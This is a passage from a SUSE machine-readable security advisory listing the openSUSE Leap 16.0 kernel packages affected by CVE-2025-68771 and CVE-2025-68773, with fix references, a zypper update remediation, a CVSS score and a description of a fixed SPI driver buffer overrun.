"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68771",
"url": "https://www.suse.com/security/cve/CVE-2025-68771"
},
{
"category": "external",
"summary": "SUSE Bug 1256582 for CVE-2025-68771",
"url": "https://bugzilla.suse.com/1256582"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68771"
},
{
"cve": "CVE-2025-68773",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68773"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: fsl-cpm: Check length parity before switching to 16 bit mode\n\nCommit fc96ec826bce (\"spi: fsl-cpm: Use 16 bit mode for large transfers\nwith even size\") failed to make sure that the size is really even\nbefore switching to 16 bit mode. Until recently the problem went\nunnoticed because kernfs uses a pre-allocated bounce buffer of size\nPAGE_SIZE for reading EEPROM.\n\nBut commit 8ad6249c51d0 (\"eeprom: at25: convert to spi-mem API\")\nintroduced an additional dynamically allocated bounce buffer whose size\nis exactly the size of the transfer, leading to a buffer overrun in\nthe fsl-cpm driver when that size is odd.\n\nAdd the missing length parity verification and remain in 8 bit mode\nwhen the length is not even.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
